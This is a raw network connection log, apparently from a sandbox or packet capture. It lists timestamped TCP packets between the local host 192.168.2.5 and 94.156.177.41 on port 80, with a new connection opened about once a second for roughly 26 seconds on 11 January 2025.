Jan 11, 2025 07:45:14.345710993 CET	80	49974	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:15.050817013 CET	80	49974	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:15.050837040 CET	80	49974	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:15.050986052 CET	49974	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:15.054054976 CET	49974	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:15.058959007 CET	80	49974	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:15.196770906 CET	49980	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:15.201735020 CET	80	49980	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:15.201824903 CET	49980	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:15.203553915 CET	49980	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:15.208513975 CET	80	49980	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:15.208568096 CET	49980	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:15.213304996 CET	80	49980	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:15.918282986 CET	80	49980	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:15.918335915 CET	80	49980	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:15.918385029 CET	49980	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:15.918412924 CET	49980	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:15.926098108 CET	80	49980	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:16.063947916 CET	49986	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:16.068974018 CET	80	49986	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:16.069056034 CET	49986	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:16.071130037 CET	49986	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:16.076009989 CET	80	49986	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:16.076062918 CET	49986	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:16.080858946 CET	80	49986	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:16.804552078 CET	80	49986	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:16.804728985 CET	49986	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:16.804748058 CET	80	49986	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:16.804811954 CET	49986	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:16.809545994 CET	80	49986	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:16.938884020 CET	49993	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:16.943836927 CET	80	49993	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:16.943934917 CET	49993	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:16.945713997 CET	49993	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:16.950690031 CET	80	49993	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:16.950781107 CET	49993	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:16.955754042 CET	80	49993	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:17.675302029 CET	80	49993	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:17.675384045 CET	80	49993	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:17.675447941 CET	49993	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:17.675447941 CET	49993	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:17.680320024 CET	80	49993	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:17.816253901 CET	50002	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:17.821216106 CET	80	50002	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:17.821331978 CET	50002	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:17.823518038 CET	50002	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:17.828346968 CET	80	50002	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:17.828450918 CET	50002	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:17.833347082 CET	80	50002	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:18.537332058 CET	80	50002	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:18.537369013 CET	80	50002	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:18.537447929 CET	50002	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:18.537748098 CET	50002	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:18.542552948 CET	80	50002	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:18.931071997 CET	50010	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:18.935986042 CET	80	50010	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:18.936070919 CET	50010	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:18.938288927 CET	50010	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:18.943037987 CET	80	50010	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:18.943087101 CET	50010	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:18.947921038 CET	80	50010	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:19.654258013 CET	80	50010	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:19.654335022 CET	80	50010	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:19.654529095 CET	50010	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:19.654529095 CET	50010	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:19.659466028 CET	80	50010	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:19.804260969 CET	50016	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:19.809236050 CET	80	50016	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:19.809458017 CET	50016	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:19.811455011 CET	50016	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:19.816498041 CET	80	50016	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:19.816581011 CET	50016	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:19.822182894 CET	80	50016	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:20.537265062 CET	80	50016	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:20.537468910 CET	80	50016	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:20.537471056 CET	50016	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:20.537564993 CET	50016	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:20.542283058 CET	80	50016	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:20.679095030 CET	50022	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:20.684103966 CET	80	50022	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:20.684201956 CET	50022	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:20.687104940 CET	50022	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:20.691986084 CET	80	50022	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:20.695533991 CET	50022	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:20.700653076 CET	80	50022	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:21.400357962 CET	80	50022	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:21.400388002 CET	80	50022	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:21.400480032 CET	50022	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:21.401774883 CET	50022	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:21.406519890 CET	80	50022	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:21.894958019 CET	50027	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:21.899843931 CET	80	50027	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:21.899916887 CET	50027	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:21.901951075 CET	50027	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:21.906740904 CET	80	50027	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:21.906790972 CET	50027	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:21.911572933 CET	80	50027	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:22.637254000 CET	80	50027	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:22.637383938 CET	80	50027	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:22.637453079 CET	50027	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:22.637485981 CET	50027	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:22.642287016 CET	80	50027	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:22.789222002 CET	50037	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:22.794238091 CET	80	50037	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:22.794337988 CET	50037	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:22.796314955 CET	50037	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:22.801140070 CET	80	50037	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:22.801196098 CET	50037	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:22.805985928 CET	80	50037	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:23.500176907 CET	80	50037	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:23.500258923 CET	50037	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:23.500302076 CET	80	50037	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:23.500379086 CET	50037	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:23.505028009 CET	80	50037	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:23.642755032 CET	50043	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:23.647705078 CET	80	50043	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:23.648267984 CET	50043	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:23.650038958 CET	50043	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:23.654871941 CET	80	50043	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:23.654932976 CET	50043	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:23.659758091 CET	80	50043	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:24.391447067 CET	80	50043	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:24.391494036 CET	80	50043	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:24.391599894 CET	50043	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:24.409817934 CET	50043	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:24.416088104 CET	80	50043	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:24.653975010 CET	50044	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:24.658921957 CET	80	50044	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:24.659001112 CET	50044	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:24.661158085 CET	50044	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:24.666012049 CET	80	50044	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:24.666068077 CET	50044	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:24.670845032 CET	80	50044	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:25.386995077 CET	80	50044	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:25.387120008 CET	50044	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:25.387140989 CET	80	50044	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:25.387197018 CET	50044	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:25.391987085 CET	80	50044	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:25.536777020 CET	50045	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:25.541789055 CET	80	50045	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:25.541975021 CET	50045	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:25.543946981 CET	50045	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:25.548837900 CET	80	50045	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:25.549065113 CET	50045	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:25.553870916 CET	80	50045	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:26.266272068 CET	80	50045	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:26.266355038 CET	80	50045	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:26.266551971 CET	50045	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:26.266551971 CET	50045	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:26.271409988 CET	80	50045	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:26.418171883 CET	50046	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:26.423114061 CET	80	50046	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:26.423336029 CET	50046	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:26.425388098 CET	50046	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:26.430229902 CET	80	50046	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:26.431338072 CET	50046	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:26.436167955 CET	80	50046	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:27.122733116 CET	80	50046	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:27.122793913 CET	80	50046	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:27.122843981 CET	50046	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:27.126545906 CET	50046	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:27.131439924 CET	80	50046	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:27.473675966 CET	50047	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:27.478674889 CET	80	50047	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:27.478763103 CET	50047	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:27.494793892 CET	50047	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:27.499706030 CET	80	50047	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:27.499769926 CET	50047	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:27.504669905 CET	80	50047	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:28.215221882 CET	80	50047	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:28.215292931 CET	80	50047	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:28.215382099 CET	50047	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:28.218009949 CET	50047	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:28.222759962 CET	80	50047	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:28.362721920 CET	50048	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:28.367671967 CET	80	50048	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:28.367789030 CET	50048	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:28.370795965 CET	50048	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:28.375606060 CET	80	50048	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:28.375674963 CET	50048	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:28.380423069 CET	80	50048	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:29.109587908 CET	80	50048	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:29.109728098 CET	80	50048	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:29.109982014 CET	50048	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:29.109982967 CET	50048	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:29.114837885 CET	80	50048	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:29.268611908 CET	50049	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:29.273545027 CET	80	50049	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:29.273653984 CET	50049	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:29.275578976 CET	50049	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:29.280349970 CET	80	50049	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:29.280517101 CET	50049	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:29.285381079 CET	80	50049	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:29.977284908 CET	80	50049	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:29.977302074 CET	80	50049	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:29.977510929 CET	50049	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:29.977510929 CET	50049	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:29.982494116 CET	80	50049	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:30.110816956 CET	50050	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:30.115900040 CET	80	50050	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:30.116003036 CET	50050	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:30.117988110 CET	50050	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:30.122766972 CET	80	50050	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:30.122845888 CET	50050	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:30.127696991 CET	80	50050	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:30.838104010 CET	80	50050	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:30.838219881 CET	80	50050	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:30.838289976 CET	50050	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:30.838289976 CET	50050	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:30.843111992 CET	80	50050	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:30.979125977 CET	50051	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:30.984250069 CET	80	50051	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:30.984333992 CET	50051	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:30.986568928 CET	50051	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:30.991426945 CET	80	50051	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:30.991477966 CET	50051	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:30.996416092 CET	80	50051	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:31.709183931 CET	80	50051	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:31.709204912 CET	80	50051	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:31.709286928 CET	50051	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:31.709342003 CET	50051	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:31.714339018 CET	80	50051	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:31.845136881 CET	50052	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:31.850111961 CET	80	50052	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:31.850610018 CET	50052	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:31.852391005 CET	50052	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:31.859492064 CET	80	50052	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:31.859651089 CET	50052	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:31.864757061 CET	80	50052	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:32.578874111 CET	80	50052	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:32.578896999 CET	80	50052	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:32.579246044 CET	50052	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:32.581866980 CET	50052	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:32.586782932 CET	80	50052	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:32.729140043 CET	50053	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:32.734091997 CET	80	50053	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:32.734186888 CET	50053	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:32.736176014 CET	50053	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:32.740948915 CET	80	50053	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:32.741029024 CET	50053	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:32.745765924 CET	80	50053	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:33.462277889 CET	80	50053	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:33.462400913 CET	50053	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:33.462433100 CET	80	50053	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:33.462487936 CET	50053	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:33.467210054 CET	80	50053	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:33.595391035 CET	50054	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:33.600302935 CET	80	50054	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:33.600502014 CET	50054	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:33.602154970 CET	50054	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:33.607023001 CET	80	50054	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:33.607085943 CET	50054	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:33.611921072 CET	80	50054	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:34.323070049 CET	80	50054	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:34.323120117 CET	80	50054	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:34.323220968 CET	50054	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:34.323220968 CET	50054	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:34.328088045 CET	80	50054	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:34.475531101 CET	50055	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:34.480663061 CET	80	50055	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:34.480768919 CET	50055	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:34.482917070 CET	50055	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:34.487709045 CET	80	50055	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:34.487775087 CET	50055	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:34.492587090 CET	80	50055	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:35.186527014 CET	80	50055	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:35.186618090 CET	80	50055	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:35.186639071 CET	50055	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:35.186685085 CET	50055	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:35.192284107 CET	80	50055	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:35.331901073 CET	50056	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:35.337619066 CET	80	50056	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:35.337709904 CET	50056	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:35.339809895 CET	50056	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:35.345465899 CET	80	50056	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:35.345550060 CET	50056	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:35.351285934 CET	80	50056	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:36.073331118 CET	80	50056	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:36.073355913 CET	80	50056	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:36.073409081 CET	50056	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:36.076119900 CET	50056	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:36.080997944 CET	80	50056	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:36.511260033 CET	50057	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:36.516669035 CET	80	50057	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:36.516731977 CET	50057	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:36.519268990 CET	50057	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:36.525003910 CET	80	50057	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:36.525051117 CET	50057	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:36.530174017 CET	80	50057	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:37.239743948 CET	80	50057	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:37.239809990 CET	80	50057	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:37.239895105 CET	50057	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:37.239895105 CET	50057	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:37.244868994 CET	80	50057	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:37.388314962 CET	50058	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:37.393321037 CET	80	50058	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:37.393428087 CET	50058	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:37.395136118 CET	50058	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:37.399981022 CET	80	50058	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:37.400062084 CET	50058	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:37.404972076 CET	80	50058	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:38.251296997 CET	80	50058	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:38.251324892 CET	80	50058	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:38.251440048 CET	50058	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:38.251498938 CET	50058	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:38.256258011 CET	80	50058	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:38.398953915 CET	50059	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:38.403881073 CET	80	50059	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:38.403947115 CET	50059	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:38.405960083 CET	50059	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:38.410764933 CET	80	50059	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:38.410806894 CET	50059	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:38.418746948 CET	80	50059	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:39.138231039 CET	80	50059	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:39.138354063 CET	80	50059	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:39.138394117 CET	50059	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:39.139525890 CET	50059	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:39.144376993 CET	80	50059	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:39.290319920 CET	50060	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:39.295253038 CET	80	50060	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:39.295322895 CET	50060	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:39.297456026 CET	50060	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:39.302258968 CET	80	50060	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:39.302387953 CET	50060	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:39.308273077 CET	80	50060	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:40.007410049 CET	80	50060	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:40.007436991 CET	80	50060	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:40.007539988 CET	50060	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:40.007606983 CET	50060	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:40.012447119 CET	80	50060	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:40.152123928 CET	50061	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:40.157037020 CET	80	50061	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:40.157560110 CET	50061	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:40.159339905 CET	50061	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:40.164132118 CET	80	50061	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:40.165796041 CET	50061	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:40.170604944 CET	80	50061	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:40.856905937 CET	80	50061	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:40.857013941 CET	80	50061	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:40.857096910 CET	50061	80	192.168.2.5	94.156.177.41
